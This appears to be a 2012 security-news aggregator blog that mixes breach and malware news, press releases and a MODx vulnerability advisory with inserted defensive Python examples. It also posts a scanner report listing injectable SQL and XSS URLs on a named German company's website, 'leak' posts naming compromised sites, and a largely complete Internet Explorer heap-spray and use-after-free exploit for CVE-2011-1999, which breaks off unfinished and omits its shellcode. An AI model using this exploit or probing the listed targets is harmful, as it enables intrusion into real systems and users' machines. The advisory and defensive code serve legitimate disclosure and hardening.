Channel: BOT24

Stolen credentials, basic security lapses at core of 2012 breaches


A common thread can be woven through the high-profile data breaches that took place in 2012: attackers are targeting basic security lapses and configuration errors, or bypassing security systems altogether by using stolen account credentials to appear as legitimate users on the network.
In this edition of the Security Squad podcast, the SearchSecurity editorial team discusses some of the lessons learned from the top breaches of 2012. From source code leaks to credit card data, from poorly protected email and account credentials to intellectual property, attackers demonstrated that they can get into corporate systems and often remain there undetected for extended periods.
Emerging password alternatives have some complex hurdles to climb before becoming mainstream. Multi-factor authentication is being implemented by more websites, but implementation needs to be rolled out systematically and more of an effort needs to be made to encourage people to more broadly adopt the protection.  
Security awareness training is essential in reducing social engineering attacks, but the training must be done in a way that makes it personal for the end user. Programs that teach employees how to protect their children and their banking activities could eventually foster awareness and translate into better protecting the company data, experts say.
Listen to the Security Squad podcast or right click and download the MP3.

Source link: http://searchsecurity.techtarget.com/news/2240175306/Stolen-credentials-basic-security-lapses-at-core-of-2012-breaches

Detecting Compromised SSL Certificates Using Nessus


When Thieves Target SSL Certificates

SSL is one of the most commonly used protocols to provide encryption for a variety of different applications. As such, it has come under great scrutiny over the years. While SSL misconfiguration is commonplace, one of the more recent attacks against SSL is to steal the Certificate Authority (CA) certificate. (In a paper released in July 2012, NIST warned that this type of attack would increase.) Access to this certificate allows the attacker to issue valid certificates and, in the case of a code-signing certificate, to use it to sign malware. Malware executing with this level of trust has a better chance of being installed on the system. Other CA certificates are used to generate website certificates that attackers use to impersonate secure access to a given website.
Stealing Cookies
Attackers stealing CA certificates has become more common. Don't think of it as stealing a cookie (or three), but more like attackers stealing the recipe to make their own cookies (and not the ones used between web browsers and web applications).
The attacks described above provide great return on investment (ROI) for attackers. By compromising one system and stealing the CA certificate, they can often turn around and compromise several more systems. The attacks tend to remain undetected for some time as they implement valid certificates that do not generate web browser errors. Fortunately, once the compromised certificate has been identified, it can be revoked, making future usage invalid. In addition, the offending certificate can be identified and revoked in your environment.

Finding Compromised Certificates

Nessus has several plugins to detect this type of vulnerability, including:

read more.....http://blog.tenablesecurity.com/2012/12/detecting-compromised-ssl-certificates-using-nessus.html

Ransomware: Extorting Money by Panic and Pressure


We have blogged in the past about ransomware being a growing menace and that ONE SHOULD NOT PAY RANSOM if affected. Ransomware has now reared its ugly head once again. The writers of Trojan.Ransomlock.G (a.k.a. Reveton) have updated their locking screen to induce panic and blackmail the user into paying the ransom.
Recently, blogger Kafeine found a ransomware sample which threatens to format and wipe all the documents on the compromised system if the user attempts to unlock the computer manually.
 
Figure 1. New Trojan.Ransomlock.G lock screen
 
Symantec Security Response has analyzed the malware sample and did not find any code related to this wiper functionality. In our tests we also manually removed the ransomware from the system and unlocked the computer without any formatting or files being deleted.

read more......http://www.symantec.com/connect/blogs/ransomware-extorting-money-panic-and-pressure

Pharmaceutical scammers spamvertise YouTube themed emails, entice users into purchasing counterfeit drugs


Pharmaceutical scammers are currently spamvertising a YouTube-themed email campaign, attempting to socially engineer users into clicking on the links found in the legitimate-looking emails.
Upon clicking on the fake YouTube personal message notification, users are redirected to a website reselling popular counterfeit drugs. The cybercriminals behind the campaign then earn revenue through an affiliate network.
More details:
Sample screenshot of the spamvertised email:
Once users click on the link found in the email, they’re redirected to the following holiday-themed pharmaceutical web site:
Spamvertised URL:
hxxp://roomwithaviewstudios.com/inherits.html
Landing URL:
hxxp://canadapharmcanadian.net – 109.120.138.155
The following fraudulent pharmaceutical sites have also been known to respond to the same IP (109.120.138.155):
Fortunately, during the time of testing the responsiveness of the site, it was desperately trying to remain online, which prevented the socially engineered users from initiating a transaction through it. However, this is sadly an isolated incident. According to recently published research, hundreds of thousands of US-based users click on links found in these types of fraudulent emails, and actually add counterfeit drugs to their shopping carts. The vibrant cybercrime ecosystem is in fact so advanced that, in order to stimulate the affiliate network participants into converting more traffic into actual customers, they even hold annual contests aiming to build a loyal community of network participants.
This isn’t the first time that we’ve intercepted attempts by pharmaceutical scammers to socially engineer potential customers into clicking on the links found in legitimate-looking emails. In the past, we’ve found fake Google Pharmacies and emails impersonating YouTube and Twitter, as well as Facebook Inc., in an attempt to add more authenticity and legitimacy to their campaigns.
We expect to see more of these campaigns in 2013, with a logical peak over the next couple of days, so watch what you click on, don’t enter your credit card details on websites found in spam emails, and never bargain with your health.
You can find more about Dancho Danchev at his LinkedIn Profile. You can also follow him on Twitter.

ESA EUROPEAN SPACE AGENCY LEAK BY LULZSEC CHILE

As always, this information is for educational purposes. We show these compromised systems so that you understand the current threat environment that surrounds us every day and how important it is to take the appropriate countermeasures to safeguard your critical data, no matter what size your organization is, as well as your individual data-driven devices. Below is the POC of the exploit. Again, as always, be proactive, not reactive, in safeguarding your critical data, and stay safe out there. As you are aware, this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures, such as those described in ISO 13335, to prevent yourselves from becoming victims in the current threat environment.

The breach is provided below, as I will continue to monitor the net to safeguard systems' and individuals' critical data. Additionally, this information is provided to our readers as an addendum to the California Database Security Breach Act.



ESA EUROPEAN SPACE AGENCY BY LULZSEC CHILE






//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc. nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.

Facebook Camera App Vulnerable to Man in The Middle Attack


An Egypt-based security researcher has reported that the Facebook Camera app
for mobile devices is vulnerable to a man-in-the-middle attack, which allows
an attacker on the same network to tap traffic, hijack Camera users' accounts
and steal information such as email addresses and passwords.

Mohamed Ramadan, a trainer with Attack-Secure, previously reported a similar
vulnerability in the Etsy app for iPhone.

Mohamed explains "The problem is that the app accepts any SSL
certification from any source, even evil SSL certifications, and this
enables any attacker to perform man in the middle attacks against
anyone who uses the Facebook Camera app for iPhone. This means that
the application doesn’t warn the user if someone in the same (Wi-Fi
network) is trying to hijack his or her Facebook account."

Facebook suggests that users upgrade the Camera application to version
1.1.2.
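The bug the researcher describes, "accepts any SSL certification from any source", is a client that never validates the server's certificate. As an added illustration (not code from the article or from Facebook's app), here is that misconfiguration reproduced with Python's ssl module beside the hardened form, plus a small audit helper and a certificate-pinning check; the function names and the sample DER bytes are constructed for the example.

```python
import hashlib
import ssl

# Added example, not code from the article or from the Facebook app:
# the "accept any certificate" bug reproduced with Python's ssl module,
# beside the hardened client configuration and a pinning check.


def make_insecure_context():
    """Reproduces the reported bug: any certificate from any issuer is
    accepted and the server name is never checked, so an attacker on the
    same Wi-Fi network can terminate the TLS session with their own
    certificate and read the credentials the app sends."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False       # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE  # "accepts any SSL certification"
    return ctx


def make_hardened_context(cafile=None):
    """Hardened form: the chain must validate against a trusted CA set
    (cafile, or the platform store when None), the hostname must match
    the certificate, and pre-TLS 1.2 protocol versions are refused."""
    ctx = ssl.create_default_context(cafile=cafile)
    ctx.verify_mode = ssl.CERT_REQUIRED
    ctx.check_hostname = True
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def audit_context(ctx):
    """Findings a reviewer would raise about a client-side SSLContext.
    An empty list means the context enforces the checks listed above."""
    findings = []
    if ctx.verify_mode != ssl.CERT_REQUIRED:
        findings.append("peer certificate not verified (verify_mode is not CERT_REQUIRED)")
    if not ctx.check_hostname:
        findings.append("server hostname not checked against the certificate")
    if ctx.minimum_version < ssl.TLSVersion.TLSv1_2:
        findings.append("protocol versions below TLS 1.2 allowed")
    return findings


def sha256_fingerprint(der_cert):
    """Colon-separated SHA-256 fingerprint of a DER-encoded certificate,
    the same value printed by 'openssl x509 -noout -fingerprint -sha256'."""
    digest = hashlib.sha256(der_cert).hexdigest().upper()
    return ":".join(digest[i:i + 2] for i in range(0, len(digest), 2))


def peer_matches_pin(der_cert, pinned_fingerprints):
    """Certificate pinning: the extra check an app can run after the
    handshake on sock.getpeercert(binary_form=True). Even a certificate
    that chains to a trusted CA is rejected unless it is one the app ships."""
    return sha256_fingerprint(der_cert) in pinned_fingerprints


if __name__ == "__main__":
    print("insecure:", audit_context(make_insecure_context()))
    print("hardened:", audit_context(make_hardened_context()))
    # Constructed placeholder bytes, not a real certificate.
    sample_der = b"constructed placeholder, not a real certificate"
    print("pin ok:", peer_matches_pin(sample_der, {sha256_fingerprint(sample_der)}))
```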


read more.....http://thehackernews.com/2012/12/facebook-camera-app-vulnerable-to-man.html

OPTICUM GMBH Site Vulnerabilities (Scan)


http://www.opticum-gmbh.de Scan Report

Made By H3Cio5.Brain


Basic Information
Version: NULL
Server: Apache/2.2.22
WWWRoot: NULL
user: NULL
IsAdmin: -1
Database: NULL
Sa_PasswordHash: NULL

Vulnerability Result
No.1
ReferURL: http://www.opticum-gmbh.de/?y=6&PHPSESSID=99999999
Parameter: PHPSESSID=99999999
Type: String
KWord/ActionURL: OPTICUM
Vulnerability: URL SQL INJECTION

No.2
ReferURL: http://www.opticum-gmbh.de/
Parameter: przekazanyemail
Type: POST
KWord/ActionURL: http://www.opticum-gmbh.de/newsletter.php^PHPSESSID=d669b960723a5f3dfddc73a0af56e62a&przekazanyemail=WCRTESTINPUT000001<>%3c%3e%253c%253e
Vulnerability: Cross Site Scripting (Form)

No.3
ReferURL: http://www.opticum-gmbh.de/?y=3&cmd=view&category=1&hdsd=&p1=&filtrate=&s=2
Parameter: hdsd
Type: GET
KWord/ActionURL: http://www.opticum-gmbh.de/?y=3&cmd=view&category=1&hdsd=WCRTESTINPUT000003<>%3c%3e%253c%253e&p1=&filtrate=&s=2
Vulnerability: Cross Site Scripting (URL)

No.4
ReferURL: http://www.opticum-gmbh.de/?y=3&cmd=view&category=1&hdsd=&p1=&filtrate=&s=2
Parameter: p1
Type: GET
KWord/ActionURL: http://www.opticum-gmbh.de/?y=3&cmd=view&category=1&hdsd=&p1=WCRTESTINPUT000004<>%3c%3e%253c%253e&filtrate=&s=2
Vulnerability: Cross Site Scripting (URL)

No.5
ReferURL: http://www.opticum-gmbh.de/?y=3&cmd=view&category=1&hdsd=&p1=&filtrate=&s=2
Parameter: filtrate
Type: GET
KWord/ActionURL: http://www.opticum-gmbh.de/?y=3&cmd=view&category=1&hdsd=&p1=&filtrate=WCRTESTINPUT000005<>%3c%3e%253c%253e&s=2
Vulnerability: Cross Site Scripting (URL)

Proof Of Concept - SQL INJECTION
Parameter / Value
URL: http://www.opticum-gmbh.de/?y=6&PHPSESSID=99999999
RequestType: GET
DatabaseType: SQLServer
InjectionType: String
GettingDataBy: Blind





Chinese Site -xiaobin.com.cn SQLi (Leak)


As always, this information is for educational purposes. We show these compromised systems so that you understand the current threat environment that surrounds us every day and how important it is to take the appropriate countermeasures to safeguard your critical data, no matter what size your organization is, as well as your individual data-driven devices. Below is the POC of the Chinese site compromise. Again, as always, be proactive, not reactive, in safeguarding your critical data, and stay safe out there. As you are aware, this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures, such as those described in ISO 13335, to prevent yourselves from becoming victims in the current threat environment.
The breach is provided below, as I will continue to monitor the net to safeguard systems' and individuals' critical data. Additionally, this information is provided to our readers as an addendum to the California Database Security Breach Act.






Vuln found by xjoker and (REL) by xJoker xDDDDD

http://www.xiaobin.com.cn/  <<<<<<VULN Site!!!






Innovative VPN Routers Help Increase Internet Privacy for Home Users


As concerned consumers turn to VPN for privacy, Sabai Technology puts easiest to use VPN Routers on post-holiday discount.


Simpsonville, SC (PRWEB) December 26, 2012

December has been a tough month for internet security geeks. Between the authoritarian win at Dubai’s International Telecommunication Union conference and the continued crack down of the “Great Firewall” in China, even everyday users are beginning to take notice that big brother could be watching.
These trends are causing a rise in consumer Virtual Private Networks (VPN) use from providers like StrongVPN. Traditionally used for business, the privacy, security, and anonymity VPN affords can also appeal to home users looking to protect themselves from the prying eyes of the government or the hacker next door.
However, extending this privacy to an entire network requires a specialized VPN router, which historically has been a user’s nightmare in both usability and price. Bucking that trend is Sabai Technology, which takes brand-name favorites like the Linksys E4200 and installs a customized VPN operating system, Sabai OS, with features like Dual Gateway, which allows a user to run local and VPN connections from a single router.
For users looking to increase the security of their home network in 2013, Christmas isn’t quite over. Sabai Technology is featuring two of their most popular models, the E3000 and E4200, both manufactured by Linksys, in a post-holiday sale. All Sabai Technology routers come with the Sabai OS pre-installed and boast a 5-minute setup process, extending a single VPN service account to every networked device in the user’s home.
One security-conscious Sabai customer says, “I recommend Sabai Technology VPN Routers to everyone and anyone. They are very reliable and the tech support is one of the best I have ever seen.”
Sabai Technology has been called one of the “Technologies That Will Change the World,” and consumers seem to agree. The company has reached record sales in 2012, which they are using to fuel the development fire. “We are looking forward to 2013. Customers new and old are going to see increased functionality and brand new offerings. People will want to be a part of this,” says Sabai President William Haynes. With just a handful of sales promotions a year, it appears that now is a great time to check on your home internet security.
Sabai Technology is a VPN networking solution for the every-man, offering easy to use VPN Routers that work with some of the largest VPN service providers in the world. Customers use Sabai's products to extend their PPTP or OpenVPN account to multiple devices and utilize VPN services on products that aren't otherwise accessible. For more information, visit http://sabaitechnology.com.

PolicyPak Software Delivers Security and Lockdown Management for FoxIT Reader


The new pak gives IT admins the ability to manage, lockdown and remediate the PDF reader.

(PRWEB) December 26, 2012

PolicyPak Software, a leader in desktop management software, has released their latest software pak, which streamlines the process for IT admins to configure and control settings for FoxIT Reader.
The pre-configured Pak used in conjunction with PolicyPak Professional software allows IT admins to turn off automatic updates, disable dangerous items like Javascript (the source of many security related attacks) and ensure that "Enable Safe Reading Mode" is always turned on. The PolicyPak solution is a true Group Policy extension and not just an "ADM" template.
"If you’re going to be deploying FoxIT Reader to all of your client machines, you’re going to want to make sure that the application itself is locked down and secure. Without PolicyPak, you’ve got nothing performing any remediation on this application. Users can just work around your security settings and steamroll over you," says Jeremy Moskowitz, the founder of PolicyPak. He is an expert on Group Policy.
PolicyPak Professional customers have free access to the FoxIT Reader pak, as well as dozens of other pre-configured applications. Some of the most popular applications offer solutions for Java, Flash, Firefox and Shockwave. Solutions are also available for less popular applications and homegrown applications with the PolicyPak Design Studio.
IT Admins can find out more about PolicyPak by attending a Group Policy Webinar at the PolicyPak Website, or by calling (800) 883-8002.
About PolicyPak Software:
PolicyPak Software (http://www.policypak.com) is the leader in application compliance and desktop management tools for Active Directory. The software enables IT pros to deliver, lockdown and remediate settings for desktops, laptops, VDI sessions, company devices, as well as personal “BYOD” devices. PolicyPak was founded by desktop management expert and Microsoft Group Policy MVP Jeremy Moskowitz.

Three Pieces of Malware Found to Target Korean Gamers


Researchers from Microsoft’s Malware Protection Center have analyzed three pieces of malware that appear to be used to target gamers in Korea, particularly users who play card games.

Experts believe that the malware authors are utilizing their creations to steal various pieces of information from their victims, but some of the techniques might also be utilized to cheat.

Trojan:Win32/Urelas.C, a malware developed in Delphi, takes screenshots of the victim’s gaming activity. These screenshots are sent to a remote server in various image formats, including JPEG, TIFF and BMP.


Besides taking screenshots, which could be used by the cybercriminals to observe the gaming behavior of the victims or to cheat, Urelas.C also collects valuable information from the infected computers.

Trojan:Win32/Gupboot.A is the second piece of malware currently targeting Korean players. This one is more sophisticated, since it contains a bootkit component and code from Urelas to overwrite the master boot record (MBR).

“Part of this malware’s payload is to allow kernel-mode hooking to hide the malware process and its suspicious activities from the user, making the system run in a compromised state. Like most malware that overwrites the MBR, the main intent is to use the malware’s 16-bit loader to execute the payload,” Marianne Mallen of MMPC explains.


read more....http://news.softpedia.com/news/Three-Pieces-of-Malware-Found-to-Target-Korean-Gamers-317178.shtml?utm_source=dlvr.it&utm_medium=twitter

New Year’s Resolutions for Cyber Security


January is often viewed as a chance to start fresh and to improve on the previous year by making modest resolutions that hopefully we keep throughout the year.

For credit unions, January presents an excellent opportunity to step back and consider ways to strengthen our overall security posture. Following that review, our New Year’s resolutions will no doubt include something beyond a promise to eat better and exercise more.

Perhaps a resolution to invest in security training, more effectively probe for vulnerabilities, or re-evaluate monitoring of critical IT systems?

The following ideas, based on situations we have encountered in our core processing service, should contribute to a brighter, more successful and secure year ahead.

Invest in Security Training

A major security takeaway from last year: The realization that great information security requires genuine enthusiasm and a strong, ongoing commitment to learning.  Can you imagine a stagnant security effort protecting your credit union from threats? I can’t.

As a New Year’s resolution, consider expanding your security training to include all staff. Ask your senior management team to encourage training activities, and to ensure that the training is appropriate for the trainees.  There are many flavors of security training – from awareness to deep system analysis. Here are a few recommendations:

For Everyone – Security Awareness Training

Far too often, human beings are the weakest link in our security chain. No wonder that security awareness training is a critical component of any successful security program. Training enables you to educate the entire staff about current issues – from phishing attacks to the importance of shredding sensitive documents.

It’s also a great opportunity to remind staff to treat sensitive information as if it were their own, and to educate them on the significant costs associated with security breaches. Everyone should walk away with a fresh appreciation for the importance of security to your organization.

For Security Staff

Security personnel should consider taking the General Security (GSEC) course and certification offered by the SANS Institute, the most trusted source for information security training and security certification in the world.  The course covers the most important topics in information security, from defense-in-depth to Web application security. It’s a great foundation for addressing security challenges in a broad range of business situations.

For the Techies

Your technical staff should be enriching their skills with courses and certifications offered by the SANS Institute and International Council of E-Commerce Consultants (EC-Council). These courses dig into operating system security, network security and firewalls, incident handling, penetration testing, wireless security and much more. Consider using these certifications to build expertise where you need it most.

For Auditing Staff

Greater familiarity with information technology and security issues can only help your personnel involved in auditing and IT governance. Consider courses offered by ISACA (Information Systems Audit and Control Association), ISC2 and the SANS Institute. Certifications earned through these programs can strengthen your auditing capability.

Probe for Vulnerabilities

Read more.....http://www.cutimes.com/2012/12/26/new-years-resolutions-for-cyber-security?ref=hp&utm_source=twitterfeed&utm_medium=twitter

What criminals do with stolen passwords


Not long ago, PCs compromised by malware were put to a limited number of fraudulent uses, including spam, click fraud and denial-of-service attacks. These days, computer crooks are extracting and selling a much broader array of data stolen from hacked systems, including passwords and associated email credentials tied to a variety of online retailers.
At the forefront of this trend are botnet creation kits like Citadel, ZeuS and SpyEye, which continue to make it simple for miscreants to assemble collections of compromised machines. Botnets are networks of infected or zombie computers which obey a remote command-and-control master. The term is also used for the botnet malware which infects the computers. By default, most bot malware will extract any passwords stored in the victim PC's browser, and will intercept and record any credentials submitted in web forms, such as when a user enters his credit card number, address and other details at an online retail shop.
Some of the most valuable data extracted from hacked PCs is bank login information. But non-financial logins also have value, particularly for shady online shops that collect and resell this information.

This shop sells credentials to active accounts at dozens of leading e-retailers. Photo: KrebsOnSecurity
Logins for everything from Amazon.com to Walmart.com often are resold — either in bulk, or separately by retailer name — on underground crime forums. A miscreant who operates a Citadel botnet of some size (a few thousand bots) can expect to quickly accumulate huge volumes of logs - records of user credentials and browsing history from victim PCs. Without even looking that hard, I found several individuals on the underground Underweb forums selling bulk access to their botnet logs. For example, one Andromeda bot user was selling access to 6 gigabytes of bot logs for a flat rate of $US150 ($144).


Read more: http://www.watoday.com.au/it-pro/security-it/what-criminals-do-with-stolen-passwords-20121227-2bx65.html#ixzz2GFdbaDr0

Huge rise in social media 'crimes'


The number of alleged crimes involving Facebook and Twitter has increased nearly eight-fold in four years, according to police figures.

There were 653 people charged in 2012 out of 4,908 offences reported to 29 forces in England, Scotland and Wales.

Police chiefs said the figures demonstrate a new challenge.

Last week, interim guidelines were issued, aimed at reducing the number of charges in England and Wales, after a string of controversial court cases.

The conviction of Paul Chambers in 2010 for joking on Twitter about blowing up Robin Hood Airport in South Yorkshire was widely condemned and eventually quashed.

The latest statistics were released by the police under the Freedom of Information Act.

In 2008, when the level of social network activity was much lower, there were 556 reports of alleged crimes with 46 people charged.

By this year that figure had risen to 4,908 allegations and 653 charged.

Chief Constable Andy Trotter of the Association of Chief Police Officers said it was important that police prioritised social networking crimes which caused genuine harm.


read more....http://www.bbc.co.uk/news/uk-20851797

Record-breaking 17.4 million Android and iOS devices activated on Christmas Day; tablets top smartphones


More Android and iOS devices were activated on Christmas Day this year than on any other day. According to analytics firm Flurry, 17.4 million Android and iOS devices were activated during the holiday, an increase of 332% compared to an average of 4 million activations per day. This year’s numbers were found to be more than two and a half times larger than Christmas Day last year, which saw 6.8 million devices activated. Once their smartphones and tablets were turned on, consumers collectively downloaded 328 million applications.

read more.......http://bgr.com/2012/12/27/android-ios-activations-christmas-day-270963/

MODx Revolution CMS Brute Force (BF), Cross-Site Request Forgery (CSRF), Abuse of Functionality (AOF) and Insufficient Anti-Automation (IAA) Vulnerabilities


I want to warn you about multiple vulnerabilities in MODx Revolution.

These are Brute Force, Cross-Site Request Forgery, Abuse of Functionality
and Insufficient Anti-automation vulnerabilities in MODx. It's about the 2.x
(Revolution) versions of MODx. In the 0.x and 1.x (Evolution) versions of MODx
CMS there are many more holes, about which I wrote earlier. The developers
changed the code of their CMS in the 2.x versions, which decreased the number of
vulnerabilities (like the DoS hole, but the Login Enumeration hole just changed
into a different one). As I found at the tested web site, one Ukrainian
government site, there were also multiple XSS holes on it (which are still not
fixed), which were not related to the core of the engine; it was custom code.

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of MODX Revolution (2.x versions of engine).

----------
Details:
----------

Brute Force (WASC-11):

In the login form (http://site/manager/) there is no protection against
Brute Force attacks.

Cross-Site Request Forgery (WASC-09):

The lack of a captcha in the login form (http://site/manager/) can be used
for different attacks: a CSRF attack to log into an account (remote login, to
conduct attacks on vulnerabilities inside the account), automated entering
into the account, phishing and other automated attacks, which you can read
about in the article "Attacks on unprotected login forms"
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html).

Abuse of Functionality (Login Enumeration) (WASC-42):

In the login form (http://site/manager/) Login Enumeration is possible.
Different messages are shown for correct and incorrect logins.

Insufficient Anti-automation (WASC-21):

In the login form there is no protection against automated requests, which
allows picking up logins in an automated way by attacking the login function,
and by attacking the password recovery function it is possible to reveal
users' emails. Both functions are placed on the same page.

------------
Timeline:
------------

2012.06.28 - announced on my site about MODx Evolution.
2012.06.28 - informed the developers about the first part of the
vulnerabilities in MODx Evolution.
2012.06.30 - informed the developers about the second part of the
vulnerabilities in MODx Evolution.
2012.07.26 - announced on my site about MODx Revolution.
2012.07.28 - informed the developers about the vulnerabilities in MODx
Revolution and reminded them about the previous two letters.
2012.07.28-2012.10.31 - during the conversation with the developers about
MODx Revolution, I was constantly reminding them that I had sent them info
about the holes in Evolution and could resend it, because it was clear that
they had missed it (they were only answering concerning Revolution).
2012.11.02 - after the developers said they wanted to see this information
(missed by them in June), I resent the first two letters to the developers.
2012.12.27 - disclosed on my site (http://websecurity.com.ua/5981/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
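As an added defensive example (my code, not MODx's, written in Python rather than the CMS's PHP), the following login and recovery handler addresses the four issues in the advisory above: one message for unknown user and wrong password, a per-source attempt limit, a session-bound CSRF token on the login form, and a uniform password-recovery reply. The dict-backed stores, message texts and limits are assumptions made for the example.

```python
# Added example (not MODx code): a login/recovery handler covering the four
# gaps in the advisory: one reply for unknown user and wrong password (no
# enumeration), a per-source attempt limit (brute force / anti-automation),
# a session-bound CSRF token (login CSRF) and a uniform password-recovery
# reply. Dicts stand in for the database and session store.
import hashlib, hmac, os, time

GENERIC_FAIL = "Invalid username or password."
LOCKED_MSG = "Too many attempts; try again later."
RECOVERY_MSG = "If that account exists, a reset link has been e-mailed."
MAX_ATTEMPTS, WINDOW_SECONDS = 5, 300

def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

class LoginService:
    def __init__(self):
        self.users = {}                    # username -> (salt, pw_hash, email)
        self.attempts = {}                 # (client_ip, username) -> [timestamps]
        self.sessions = {}                 # session_id -> csrf_token
        self._dummy_salt = os.urandom(16)  # hashed against for unknown users

    def add_user(self, username, password, email):
        salt = os.urandom(16)
        self.users[username] = (salt, hash_password(password, salt), email)

    def new_session(self):
        sid, token = os.urandom(16).hex(), os.urandom(16).hex()
        self.sessions[sid] = token
        return sid, token

    def _locked(self, key, now):
        recent = [t for t in self.attempts.get(key, []) if now - t < WINDOW_SECONDS]
        self.attempts[key] = recent
        return len(recent) >= MAX_ATTEMPTS

    def login(self, sid, csrf_token, username, password, client_ip, now=None):
        now = time.time() if now is None else now
        # Login CSRF: the form must carry the token issued to this session.
        if not hmac.compare_digest(self.sessions.get(sid, ""), csrf_token):
            return False, GENERIC_FAIL
        key = (client_ip, username)   # counted whether or not the user exists
        if self._locked(key, now):
            return False, LOCKED_MSG
        salt, stored, _ = self.users.get(username, (self._dummy_salt, b"", None))
        # Always hash: a fast "no such user" path would leak through timing.
        if not hmac.compare_digest(hash_password(password, salt), stored):
            self.attempts.setdefault(key, []).append(now)
            return False, GENERIC_FAIL   # same text as for an unknown user
        self.attempts.pop(key, None)
        return True, "Welcome."

    def recover(self, username):
        # One reply either way: recovery must not confirm names or reveal e-mails.
        return RECOVERY_MSG
```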





//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Kaspersky Lab Boosts Linux Mail Security


Kaspersky Lab ZAO gave its Kaspersky Security for Linux Mail Server a few strong tweaks in the security area with an update that bolsters protection against spam and malware spread by e-mail, giving the channel a competitive edge when breaking into growing open-source security niches.

Kaspersky’s refreshed security solution, which serves Linux and FreeBSD mail servers, contains revamped security mechanisms that partners can use to gain ground in competitive open-source markets. One of the biggest improvements is a zero-day exploit and targeted attack shield, dubbed ZETA Shield technology, designed to detect and block unknown and increasingly sophisticated advanced persistent threats (APTs) delivered via e-mail attachments.

The solution touts a new enforced antispam update service (EASUS) technology, which pushes updates from the Kaspersky cloud to the customers in real time. The revamped spam technology addresses what Kaspersky calls the “hit and run” tactic used by cybercriminals to bombard victims with at least half of the spam assault in the first 10 minutes.

The security solution also features a new cloud-assisted content reputation filtering system aimed at combating spam and reducing false positives. The content reputation technology fragments e-mail content, then analyses and compares the fragments with known samples of unwanted e-mail.


read more..............http://channelnomics.com/2012/12/27/kaspersky-lab-boosts-linux-mail-security/

Ransomware Takes New Turn for Money - Online Surveys


A new ransomware scam has taken an interesting twist – rather than simply demanding payment, the attackers want the victims to fill out a survey.

It is a new tack for a scam that traditionally relies on threats and intimidation, and perhaps a foreshadowing of what is to come, noted Malwarebytes Malware Intelligence Lead Adam Kujawa.

"The users are asked to fill out demographic information, personal information - [such as] name, address, phone number - and near the end of the survey, are required to click on "special offers" from the advertisers that usually includes something along the lines of "Pay $1 for a year free subscription to XYZ magazine" or "Try a month free trial of some music download site for only $2.50"," he said. "The survey justifies these offers by offering to the user a [fake] $25 or $50 gift certificate to somewhere like Walmart or BestBuy."

read more............http://www.securityweek.com/ransomware-takes-new-turn-money-online-surveys?utm_source=dlvr.it&utm_medium=twitter

Internet Explorer Select Element RCE - CVE-2011-1999 ?


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" id="doctype1">
<html>
<head>
<script type="text/javascript">

function int_to_hex(dword)
{
var d=Number(dword).toString (16);
while(d.length<8) d='0'+d;
return unescape('%u'+d.substr(4,8)+'%u'+d.substr(0,4));
};

spraybase = 0x0a0a0024;

var shellcode = unescape(""); // encoded shellcode blob omitted

var heapspray =
int_to_hex(0x785863F6)
+ int_to_hex(0x7854F203)
+ int_to_hex(0x7C7D1AD4)
+ int_to_hex(0x785863F6)
+ int_to_hex(0x78590ABC)
+ int_to_hex(spraybase)
+ int_to_hex(0x3000)
+ int_to_hex(0x40)
+ int_to_hex(spraybase)
+ int_to_hex(0x7854F203)
+ int_to_hex(0x0a0a0220)
+ int_to_hex(0x78590ABC)
+ '11'
;

heapspray += int_to_hex(spraybase + 0x1F8 +4);

while (heapspray.length < 0x1F8/2)
{
heapspray += 'AA';
}

heapspray += int_to_hex(0x63f0575b); // virtual function 63f0575b

heapspray += shellcode;

function build_block(s)
{
var endtag = unescape("AA");

var len = 0x10000 - (s.length *2 + endtag.length * 2);
var b = "11";
while(b.length < len) b += b;
var block = b.substring(0, len / 2);
block = s + block + endtag;

var bigblock = "";
for (var i=0; i < 8; i++) bigblock += block;
bigblock = bigblock.substring(0, (0x80000-0x28)/2);

return bigblock
}


bigblock = build_block(heapspray);
var blocks = new Array();
for(var i = 0; i < 2 * 200; i++)
blocks[i] = [bigblock].join("");

function exploit()
{
var fakeobj = int_to_hex(spraybase) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x63f01e13) +
int_to_hex(0x63F01100) +
int_to_hex(0x63f01ec4) +
int_to_hex(spraybase) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
unescape("%u0c0c%u3b3b") +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c");

var formobj, selobj, optobj;
selobj = document.getElementById("select1");
formobj = selobj.form;

var loopcount = 2;
bigarray = new Array();
for (var i=0; i<loopcount; i++)
{
var imgarray = new Array();
for(var j = 0; j < 500; j++) {
imgarray.push(document.createElement("img"));
}

bigarray.push(imgarray);
}

for (var k=0; k<loopcount; k++)
{
for(var i=0;i<5;i++) {
optobj = document.createElement('option');
optobj.text = "test";
selobj.add(optobj);
}

selobj.innerText = "foo";

for(var i = 0; i < bigarray[k].length; i++) {
bigarray[k][i].title = fakeobj.substring(0, 0x38 / 2 - 1);
}
               
